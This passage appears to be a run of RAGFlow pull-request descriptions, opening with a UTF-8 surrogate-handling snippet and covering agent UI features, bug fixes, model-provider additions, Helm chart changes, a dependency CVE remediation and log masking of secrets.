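    """Encode text as UTF-8, replacing unencodable characters with '?'."""
    # Unpaired surrogates (U+D800..U+DFFF) have no valid UTF-8 encoding.
    return text.encode("utf-8", errors="replace")


broken = "ok \ud83d"  # first half of a surrogate pair, with no partner

try:
    broken.encode("utf-8")
    strict_failed = False
except UnicodeEncodeError:
    strict_failed = True

encoded = safe_utf8(broken)
```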
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
feat(agent): Added history management and paste handling features #3221
- Added a PasteHandlerPlugin to handle paste operations, optimizing the
multi-line text pasting experience
- Implemented the AgentHistoryManager class to manage history,
supporting undo and redo functionality
- Integrated history management functionality into the Agent component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Implemented French UI translation
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: ramin cedric <>
Co-authored-by: Liu An <asiro@qq.com>
### What problem does this PR solve?
Update readme
### Type of change
- [x] Documentation Update
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Feat: Limit the appearance of loops in operators in the agent canvas
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Tiny fix to the usage of `deepdoc.pdf_parser.PlainParser` in
`rag.app.presentation.chunk`, modeled on how the class is used
elsewhere.
The fix is small enough that opening an issue seemed unnecessary.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Render dialog list #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#9232
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
1. When creating a new session, initialize an empty reference that
includes both the app api and sdk API.
2. Fix the logic when retrieving references for historical messages: the
number of dialogue messages and reference messages may differ, but it
should match the number of assistant messages.
Co-authored-by: Li Ye <liye@unittec.com>
### What problem does this PR solve?
Fix: Fixed the issue where numbers could not be displayed in the numeric
input box under white theme #3221
Fix: Set the maximum number of rounds for the agent to 1 #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This commit refactors the core prompts to decouple the high-level
reasoning from the low-level information extraction. By making
REASON_PROMPT a dedicated strategist that only generates search queries
and re-tasking RELEVANT_EXTRACTION_PROMPT to be a specialized tool for
single-fact extraction, we eliminate redundant information
summarization. This clear separation of concerns makes the overall
reasoning process significantly faster and more precise, as each
component now has a single, well-defined responsibility.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Fix: Add prompt text to the form in the MCP module #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the agent's chat box could not automatically
scroll to the bottom #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the loss of Await Response function on the share page and
other style issues #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the prompt word edit box had no scroll bar
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
list_document supports range filtering.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
**Context and Purpose:**
This PR automatically remediates a security vulnerability:
- **Description:** h11: h11 accepts some malformed Chunked-Encoding
bodies
- **Rule ID:** CVE-2025-43859
- **Severity:** CRITICAL
- **File:** uv.lock
- **Lines Affected:** None - None
This change is necessary to protect the application from potential
security risks associated with this vulnerability.
**Solution Implemented:**
The automated remediation process has applied the necessary changes to
the affected code in `uv.lock` to resolve the identified issue.
Please review the changes to ensure they are correct and integrate as
expected.
### What problem does this PR solve?
Feat: New Agent startup parameters add knowledge base parameter #9194
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix "out of memory" when slide.get_thumbnail() produces a huge image
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix "TypeError: '<' not supported between instances of 'Emu' and
'NoneType'"
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix #8424: NPE in dify_retrieval.py; also log the exception
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix:
```bash
'Langfuse' object has no attribute 'trace'
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/9177
The likely cause is that Gemini internally uses a different parameter
name:
`
max_output_tokens (int):
Optional. The maximum number of tokens to include in a
response candidate.
Note: The default value varies by model, see the
``Model.output_token_limit`` attribute of the ``Model``
returned from the ``getModel`` function.
This field is a member of `oneof`_ ``_max_output_tokens``.
`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The index name of the tag chunks is generated by the tenant id of the
knowledge base, so it should use the tenant id instead of the current
user id in the listing tags API.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR adds a data backup and migration solution for RAGFlow Docker
Compose deployments. Currently, users lack a standardized way to backup
and restore RAGFlow data volumes (MySQL, MinIO, Redis, Elasticsearch),
which is essential for data safety and environment migration.
**Solution:**
- **Migration Script** (`docker/migration.sh`) - Automates
backup/restore operations for all RAGFlow data volumes
- **Documentation**
(`docs/guides/migration/migrate_from_docker_compose.md`) - Usage guide
and best practices
- **Safety Features** - Container conflict detection and user
confirmations to prevent data loss
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
Co-authored-by: treedy <treedy2022@icloud.com>
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.19.1 to v0.20.0
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Adjust the style of the note node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed share-log UI issues and log-template bugs #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the style of the agent page bright theme #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add industry-related search keyword generation function
- When generating search keywords, support for specific industries has
been added
- If the "industry" parameter is provided, industry-specific
restrictions will be added to the prompt
- This change can help users generate more precise search keywords
within specific industries
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add a series of qwen3 latest SOTA models:
qwen3-coder-480b-a35b-instruct, qwen3-30b-a3b-instruct-2507,
qwen3-30b-a3b-thinking-2507, qwen3-235b-a22b-instruct-2507,
qwen3-235b-a22b-thinking-2507
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Remove the exception comment field from the agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix kimi-latest is not authorized.
Add kimi-thinking-preview.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
```bash
Traceback (most recent call last):
File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 635, in update_progress
info["progress_msg"] = "%d tasks are ahead in the queue..."%get_queue_length(priority)
File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 686, in get_queue_length
return int(group_info.get("lag", 0))
TypeError: int() argument must be a string, a bytes-like object or a real number, not 'NoneType'
```
This issue occurs very rarely. When a `stream` is first created, the
`lag` value may be nil, which triggers the error. Once any
message is synced, `lag` becomes `0`.
```bash
> XINFO GROUPS rag_flow_svr_queue
1) 1) "name"
2) "rag_flow_svr_task_broker"
3) "consumers"
4) (integer) 0
5) "pending"
6) (integer) 0
7) "last-delivered-id"
8) "1753952489937-0"
9) "entries-read"
10) (nil)
11) "lag"
12) (nil)
```
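
The traceback follows from how `dict.get` works: the default is used only when the key is missing, not when it is present with a `None` value. A minimal sketch of a guard, using a simplified, hypothetical helper rather than the real `get_queue_length(priority)`:

```python
def queue_length_from_group_info(group_info: dict) -> int:
    """Return the consumer-group lag, treating a missing or nil value as 0."""
    lag = group_info.get("lag")
    # group_info.get("lag", 0) would still return None when the key
    # exists with a nil value, so check for None explicitly.
    return int(lag) if lag is not None else 0
```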
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete the operator node and hide the corresponding sheet #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display operator icons on the agent form #3221
Fix: Fixed the issue where the form corresponding to the tool operator
icon could not appear after clicking it #3211
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Improve Agent templates functionality and fix some UI style issues
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the tool operator icon #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
add Kimi-K2-Instruct from Tongyi-Qianwen API
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Automatically save agent canvas content
Feat: Replace the link of the old version of the agent module #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add Generator return type annotation for tts method
- Import typing.Generator for type hints
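
For illustration, this is what such an annotation looks like on a generator function. The `tts` below is a hypothetical stand-in that yields byte chunks, not the project's method.

```python
from typing import Generator


def tts(text: str, chunk_size: int = 4) -> Generator[bytes, None, None]:
    """Hypothetical stand-in: yield the 'audio' in fixed-size byte chunks."""
    data = text.encode("utf-8")
    for start in range(0, len(data), chunk_size):
        yield data[start:start + chunk_size]
```

`Generator[bytes, None, None]` states that the function yields `bytes`, accepts nothing via `send()`, and returns nothing.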
### Type of change
- [x] Refactoring
### What problem does this PR solve?
This change makes the chat auto-scroll to the bottom as content arrives, but if the
user scrolls up, away from the generated response, auto-scroll is disabled.
Close #9062
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Charles Copley <ccopley@ancera.com>
### What problem does this PR solve?
Feat: Make the agent dialog window exposed to the outside world fill in
the begin form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#9082 #6365
<u> **WARNING: it's not compatible with the older version of `Agent`
module, which means that `Agent` from older versions can not work
anymore.**</u>
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Handling abnormal anchor points of agent operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add log-detail page, improve the style of chat boxes #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Translate operator names and allow mailboxes to reference operator
names #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Replace the placeholder test image in base64_image.py with a new sample
image data string.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Add wencai operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
`doc_ids` is a list, so it should be read with `request.args.getlist("doc_ids")`
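
Flask's `request.args` is a multi-value mapping: `get` returns only the first value for a key, while `getlist` returns all of them. The standard-library sketch below shows the same distinction with `urllib.parse.parse_qs` on a made-up query string; it is an analogy, not the endpoint's code.

```python
from urllib.parse import parse_qs

query = "doc_ids=a1&doc_ids=b2&page=1"  # made-up query string
params = parse_qs(query)

# All values for the repeated key, comparable to getlist("doc_ids").
doc_ids = params.get("doc_ids", [])

# What a single-value lookup would see: only the first entry.
first_only = doc_ids[0] if doc_ids else None
```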
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add invoke and github operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix error 429 api rate limit when building knowledge graph for all chat
model and Mistral embedding model.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Fix incomplete curl command in section 5 'Tool calling', add missing
closing braces and parentheses to complete the JSON payload
This resolves the incomplete bash script that was missing proper JSON
structure closure.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Add agent-log-list page; fix incomplete RAPTOR form submission when
saving directly after enabling #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Supports jsonl or ldjson format. Feature request from
[discussion](https://github.com/orgs/infiniflow/discussions/8774).
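
JSONL (also called LDJSON) stores one JSON value per line. A minimal parsing sketch, independent of how the project's parser is implemented:

```python
import json


def parse_jsonl(text: str) -> list:
    """Parse newline-delimited JSON, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]
```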
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enable MCP streamable-http model via docker compose
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Arxiv GoogleScholar operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Email and DuckDuckGo and Wikipedia Operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add documentation for MCP streamable-http transport.
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Feat: Add Yahoo Finance Operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Google operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the uploaded agent message file #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The operator is displayed only when the number of conditions is
greater than 1 #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Click the edit tool button of the agent form to open the
corresponding form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add agent log-sheet in canvas and log-sheet in the share page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the condition of deleting the classification
operator cannot be connected anymore #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The macOS build fails on M4: Docker Compose requires the platform to be
specified to build correctly
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Charles Copley <ccopley@ancera.com>
### What problem does this PR solve?
Feat: Filter the agent form's large model list by type #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Keep the workflow page link unchanged #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update BaseModel to use model_config instead of Config class
- Replace StrEnum with Literal types for method fields
- Convert Field declarations to Annotated style
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Add parsing animations to the agent log and optimize some page styles
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix a small, non-blocking bug in the main workflow: chunk updates when
OpenSearch is the doc engine.
The bug occurred when enabling or disabling a chunk on the “Knowledge Base /
Dataset / Chunk” web page.
<img width="2388" height="662" alt="image"
src="https://github.com/user-attachments/assets/575987a0-c929-4589-bfa0-ba54e137cfd9"
/>
It occurred because some API parameters differ between OpenSearch
and ES. After the fix, enabling, disabling, and rewriting a chunk all
work correctly. I also checked the results on the chat
web page.
<img width="2394" height="660" alt="image"
src="https://github.com/user-attachments/assets/8b899dc6-d769-4e80-8dd8-ad0fbbca5f78"
/>
I will continue to focus on vector databases, especially OpenSearch.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: 张雨豪 <zhangyh80@chinatelecom.cn>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Downstream operators can get the variables defined by the user
input operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Upload files in the chat box on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allows users to delete a condition of a conditional operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix an issue with `keep_alive=-1` for the Ollama chat model by allowing the user
to set an additional configuration option. It is a non-breaking change
because the previous default, `keep_alive=-1`, is still used.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [X] Performance Improvement
- [X] Other (please describe):
- Additional configuration option has been added to control behavior of
RAGFlow while working with ollama LLM
### What problem does this PR solve?
Feat: Modify the background color of the agent canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Obfuscates additional secrets values on ragflow_server startup to
prevent leakage:
* `secret` (azure)
* `client_secret` (oauth)
* `http_secret_key` (authentication)
* `sas_token` (azure)
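
A minimal sketch of this kind of obfuscation, assuming the configuration is a nested structure of dicts and lists. The helper name and mask string are illustrative, not the server's actual code.

```python
# Key names taken from the list above.
SENSITIVE_KEYS = {"secret", "client_secret", "http_secret_key", "sas_token"}


def mask_secrets(config, mask="********"):
    """Return a copy of `config` with the values of sensitive keys masked."""
    if isinstance(config, dict):
        return {
            key: mask if key in SENSITIVE_KEYS and value is not None
            else mask_secrets(value, mask)
            for key, value in config.items()
        }
    if isinstance(config, list):
        return [mask_secrets(item, mask) for item in config]
    return config  # scalars are returned unchanged
```

The function builds new containers rather than editing in place, so the live configuration keeps its real values and only the logged copy is masked.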
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Gifford R Nowland <gifford.r.nowland@aero.org>
### What problem does this PR solve?
Previous version created labels which were dependent on the specific
Helm chart version such as:
```
volumeClaimTemplates:
- metadata:
name: redis-data
labels:
helm.sh/chart: ragflow-0.2.3-dev.0.opensearch-test.4
app.kubernetes.io/name: ragflow
app.kubernetes.io/instance: test-1
app.kubernetes.io/version: "9a04408"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: redis
```
which causes `helm upgrade` commands to fail with
```
Upgrade "test-1" failed: cannot patch "test-1-ragflow-redis" with
kind StatefulSet: StatefulSet.apps "test-1-ragflow-redis" is
invalid: spec: Forbidden: updates to statefulset spec for fields
other than 'replicas', 'ordinals', 'template', 'updateStrategy',
'persistentVolumeClaimRetentionPolicy' and 'minReadySeconds' are
forbidden
```
because the labels changed on upgrade.
This fix uses a reduced set of labels to prevent upgrade failures.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix the Kubernetes liveness probe on the OpenSearch container. The previous
HTTP probe received a 401 response from the OpenSearch API, which was
treated as a failure and caused the container to be restarted every 20
minutes.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Replace Avatar with RAGFlowAvatar component for knowledge base and
agent, optimize Agent template page, and modify bugs in knowledge base
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Bump to infinity v0.6.0-dev4.
WARNING: infinity v0.6.0-dev4 uses a metadata format very different from
older versions. If there is existing data, you have to destroy the infinity
data volume and restart the infinity container.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add model provider DeepInfra. This model list comes from our community.
NOTE: most endpoints haven't been tested, but they should work as OpenAI
does.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Share agent dialog box externally #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
OpenAI-compatible-API supports references.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where the error prompt box on the Agent page would
be covered #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Extended embedding model timeout from 3 to 10 seconds in api_utils.py
- Added more time for large file batches and concurrent parsing
operations to prevent test flakiness
- Import from #8940
- https://github.com/infiniflow/ragflow/actions/runs/16422052652
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
PR #8665 updated chrome and chromedriver sources, removing the appended
version number. This PR resolves filename inconsistencies that would
cause `Dockerfile.deps` to fail to build when omitting `--china-mirrors`
when running `uv run download_deps.py`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Switch to Kubernetes StatefulSet resources for MySQL, Minio and vector
DB since these are stateful application components. This makes
operations such as helm upgrade smoother since the default container
update strategy becomes a sequential rolling update of each pod.
Also fixes a bug in the name template for the Minio stateful set
resource to align it with the naming convention used for other
components.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Adds configurations for the gemini-2.5-flash and gemini-2.5-pro models,
including tags, maximum token limits, and model types.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Use `quote_plus` to escape password in opendal's mysql url to support
special characters like `#`.
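
A short sketch of why the escaping matters: an unescaped `#` would start the URL fragment, and `@` would be read as the end of the credentials. The URL layout and helper name below are illustrative assumptions, not the project's exact code.

```python
from urllib.parse import quote_plus


def build_mysql_url(user, password, host, port, database):
    """Build a MySQL URL with the password percent-encoded."""
    return f"mysql://{user}:{quote_plus(password)}@{host}:{port}/{database}"


url = build_mysql_url("root", "p#ss@word", "mysql", 3306, "rag_flow")
```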
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update `get_parser_config` to merge provided configs with defaults
- Add GraphRAG configuration defaults for all chunk methods
- Make raptor and graphrag fields non-nullable in ParserConfig schema
- Update related test cases to reflect config changes
- Ensure backward compatibility while adding new GraphRAG support
- #8396
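
The merge behavior can be sketched as a recursive dictionary merge. This is an assumption-laden illustration: the helper name, the default keys, and the choice of a deep (rather than shallow) merge are not taken from `get_parser_config` itself.

```python
from copy import deepcopy

# Illustrative defaults only; the real defaults depend on the chunk method.
DEFAULTS = {
    "chunk_token_num": 128,
    "raptor": {"use_raptor": False},
    "graphrag": {"use_graphrag": False},
}


def merge_with_defaults(defaults, provided=None):
    """Overlay `provided` on a copy of `defaults`, merging nested dicts."""
    merged = deepcopy(defaults)
    for key, value in (provided or {}).items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = merge_with_defaults(merged[key], value)
        else:
            merged[key] = deepcopy(value)
    return merged
```

With this approach a caller who supplies only `{"raptor": {"use_raptor": True}}` still receives the `graphrag` defaults, which is what makes non-nullable fields workable for older clients.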
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Improve usability of Node.js/JavaScript code executor.
### Type of change
- [x] Refactoring
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Correct cancel logic error
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Feat: Adjust the page header to breadcrumbs #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add the option to use the knowledge graph to the retrieval form
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the key parameter duplication check of the
begin operator was incorrect #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue of clicking to run the agent causing an error #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Generate avatar; Add knowledge graph; Modify the style of the
multi-select component
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue that variables defined in the begin operator cannot
be referenced in the switch operator. #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display agent version in pages #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display agent history versions #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the style of the agent canvas connection line #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Adds OpenSearch support to the RAGFlow Helm chart based on
https://github.com/infiniflow/ragflow/pull/7140 and the existing
Elasticsearch support in the Helm chart.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the content of the Dropdown section cannot be
seen when selecting the next operator #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the EmbedDialog style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Show agent embed dialog #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add TavilyExtract operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the knowledge graph could not be displayed
#8890
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix the problem that the custom footer of modal component is not
effective, specify the react and react-dom versions, and add the
input-number component
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix opensearch OSConnection init.
```
docStoreConn = rag.utils.opensearch_conn.OSConnection()
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
When both `'signature_version' in self.s3_config` and
`'addressing_style' in self.s3_config` are true, the config is
initialized incorrectly: the first setting is overwritten by the last one.
This PR fixes that case.
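
A sketch of the idea, assuming the options end up as keyword arguments to botocore's `Config` (which accepts `signature_version` and `s3={"addressing_style": ...}`). The helper name is hypothetical; the point is to accumulate both options in one dict instead of building a fresh config in each branch.

```python
def build_client_config_kwargs(s3_config: dict) -> dict:
    """Collect both optional settings so that neither overwrites the other."""
    kwargs = {}
    if "signature_version" in s3_config:
        kwargs["signature_version"] = s3_config["signature_version"]
    if "addressing_style" in s3_config:
        kwargs["s3"] = {"addressing_style": s3_config["addressing_style"]}
    return kwargs


kwargs = build_client_config_kwargs(
    {"signature_version": "s3v4", "addressing_style": "path"}
)
```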
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Feat: Display the thinking process according to the start_to_think flag
of the message #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix: modify the connection ports of minio and redis in
service_conf.yaml.template
### What problem does this PR solve?
If you modify the external ports of minio and redis in the .env file, it
will also affect the connection ports inside the container in the
service_conf.yaml.template file, which is unreasonable.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Correct the logging message from "OpenAI cat_with_tools" to "OpenAI
chat_with_tools" in the `_exceptions` method of the `Base` class to
accurately reflect the method name and improve error traceability.
### Type of change
- [x] Typo
### What problem does this PR solve?
Add Kimi model series support.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixed graphknowledge Tree structure not found for treeKey.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR enhances the application's capabilities by adding support for
four new Voyage embedding models (voyage-3-large, voyage-3.5,
voyage-3.5-lite, and voyage-code-3) to the `llm_factories.json`
configuration file. These models expand the available options for text
embedding tasks, enabling improved processing of text data with a
maximum token limit of 32,000. This addition addresses the need for more
diverse and specialized embedding models to support various use cases
without altering existing functionality.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add agent tool CrawlerForm #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add CrawlerForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display file references for agent dialogues #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixed invalid save() arguments for slide thumbnails.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add authorization token field to the MCP form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix context loss caused by separating markdown tables from original
text. #6871, #8804.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This change adds 'Vietnamese' to the list of supported languages in two
components related to cross-language functionality, so that Vietnamese
becomes a selectable option.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes no chunks parsed out for Law. #5113
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust agent mcp style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Synchronize MCP data to agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the mcp list on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Filter MCP server list by text. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### AgentCreateBUGFix
Because useFetchFlowTemplates is called both in the hooks and the
AgentTemplateModal, and the ID of the empty template is generated via
uuid, there may be cases where the IDs do not match.
The mismatch produces the following error:
Prompt: 101
Required argument is missing: dsl;
<img width="472" height="121" alt="52d79682-4e50-4863-8486-f1e154003043"
src="https://github.com/user-attachments/assets/c5d217c9-b6cc-4ef2-866b-694c8b9ab3ae"
/>
### Type of change
